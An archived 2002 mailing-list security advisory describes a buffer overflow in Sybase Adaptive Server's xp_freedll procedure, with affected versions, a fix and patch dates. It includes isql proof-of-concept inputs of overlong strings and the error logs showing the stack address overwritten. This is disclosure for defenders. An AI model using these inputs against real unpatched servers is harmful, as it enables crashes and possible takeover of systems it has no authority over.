ASI Sybase Security Alert: Buffer overflow in xp_freedll

From: Aaron C. Newman (Application Security, Inc.) (anewman@APPSECINC.COM)
Date: 11/27/02

  • Next message: Aaron C. Newman (Application Security, Inc.): "ASI Sybase Security Alert: Buffer overflow in DROP DATABASE" 
    Date:         Wed, 27 Nov 2002 14:09:46 -0500
From: "Aaron C. Newman (Application Security, Inc.)" <anewman@APPSECINC.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Sybase Adaptive Server buffer overflow in xp_freedll extended stored
    procedure

    http://www.appsecinc.com/resources/alerts/sybase/02-0003.html

    To determine if you should apply this hot fix, download AppDetective for
    Sybase from http://www.sybasesecurity.net/products/appdetective/sybase/.

    Risk level: High

    Threat: Allows a non-privileged login to gain full control of the server

    Versions Affected: Sybase Adaptive Server 12.0 and 12.5

    Summary:
    The extended stored procedure xp_freedll contains a buffer overflow that
    may allow an attacker to overwrite the stack and execute arbitrary code
    under the security context of the server. Execute permissions are
    granted to public in the sybsystemprocs database on this extended stored
    procedure.

    Details:
    Sybase Adaptive Server provides an extended stored procedure (ESP)
    called xp_freedll in the database sybsystemprocs. This ESP is used to
    release a DLL that has been loaded by another extended stored procedure.

    Xp_freedll accepts a single parameter that is the name of the DLL to
    free. Xp_freedll does not validate the length of the string passed into
    the first parameter. It then attempts to copy an overly long string into
    a small memory buffer. This memory copy results in the stack and the
    stack pointer being overwritten with the buffer. Once the stack pointer
    is overwritten, execution can be redirected to an arbitrary location in
    memory and opcodes injected into the long string passed to the ESP can
    be executed. This allows the attacker to run arbitrary code under the
    security context of the extended stored procedure server.

    Below is an example of overflowing the buffer using the SQL tool
    isql.exe.

    Memory corruption first occurs with a buffer of length 45.
    1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
    2> GO
    Msg 11496, Level 16, State 7:
    Procedure 'xp_freedll', Line 2:
    Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error
    log file for detailed error description. (return status = -6)

    With a buffer of 53 bytes in length, an exception is thrown.
    1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'

    2> GO

    Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this
    is an
    user DLL check the code else contact Sybase Technical Support.

    (return status = 1)

    The following entries are recorded into the event logs.
    11403: Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp.
    If this is an user DLL check the code else contact Sybase Technical
    Support.
    11403: Encountered an exception(193) in ESP xp_freedll in DLL
    sybsyesp. If this is an user DLL check the code else contact Sybase
    Technical Support.
    11403: Encountered an exception(997) in ESP xp_freedll in DLL
    sybsyesp. If this is an user DLL check the code else contact Sybase
    Technical Support.

    At 54 bytes in length, the follow memory locations appear in the event
    logs:
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_senddone()' .
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_sendinfo()' .
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_sendstatus' .

    At 55 bytes in length, the follow memory locations appear in the event
    logs:
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x642e5858 not in pool in 'srv_senddone()' .

    Notice that the memory location has been modified to include 5858 which
    is the X we used in the buffer overflow.

    As we continue to increase the buffer size, we see that the address is
    completely overwritten by the buffer.
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x58585858 not in pool in 'srv_sendstatus' .

    Fix:
    Execute permissions on the extended stored procedure xp_freedll in the
    sybsystemprocs database should be revoked from public.

    You should also apply the following patches:
    12.5.0.2 - 11/14/2002
    12.0.0.6 ESD#1 - 11/5/2002

    These patches can be downloaded from http://downloads.sybase.com/swd/swx

    Thank you,
    support@appsecinc.com
    Application Security, Inc.
    phone: 212-490-6022
    fax: 212-490-6456
    -Protection Where It Counts-

    ----------------------------------------------------------------------
    Application Security, Inc.
    www.appsecinc.com

    As pioneers in application security, we are an organization dedicated
    to the security, defense, and protection of one of the most commonly
    overlooked areas of security - the application layer. Application
    Security, Inc. provides solutions to proactively secure (penetration
    testing/vulnerability assessment), actively defend/monitor (intrusion
    detection), and protect (encryption) your most critical applications.
    ----------------------------------------------------------------------

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Demonstrate your knowledge and understanding of core IT Security, become
    TICSA certified.

    Are you responsible for IT security in job function, but not necessarily
    in title? Do you want to prove your IT security knowledge and increase
    opportunities? Interested? Visit;

    http://www.trusecure.com/solutions/certifications/ticsa/

    for more information.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

    Relevant Pages

    • ASI Sybase Security Alert: Buffer overflow in xp_freedll
      ... Sybase Adaptive Server buffer overflow in xp_freedll extended stored ... Sybase Adaptive Server provides an extended stored procedure ... release a DLL that has been loaded by another extended stored procedure. ...
      (Bugtraq)
    • ASI Sybase Security Alert: Buffer overflow in xp_freedll
      ... Sybase Adaptive Server buffer overflow in xp_freedll extended stored ... Sybase Adaptive Server provides an extended stored procedure ... release a DLL that has been loaded by another extended stored procedure. ...
      (VulnWatch)
    • Re: Secure C library
      ... I read much of the new "security TR", and gee, I don't know. ... the buffer from the buffer size. ... It is not hard to design a better form of buffer and string handling. ... but this is just one example of how thoughtful interface design can ...
      (comp.std.c)
    • Re: Programming skills for Pen Testers
      ... each language has its own subset of security ... To elaborate further on the subject, figure that knowing about buffer ... programming does not inevitably take part of a pen-test. ... Download FREE Whitepaper "Role of Network Behavior Analysis and Response ...
      (Pen-Test)
    • [NT] Trend Micro ServerProtect Multiple Buffer Overflow Vulnerabilities
      ... Get your security news from a reliable source. ... Trend Micro ServerProtect Multiple Buffer Overflow Vulnerabilities ... The Trend ServerProtect service handles RPC requests on TCP ...
      (Securiteam)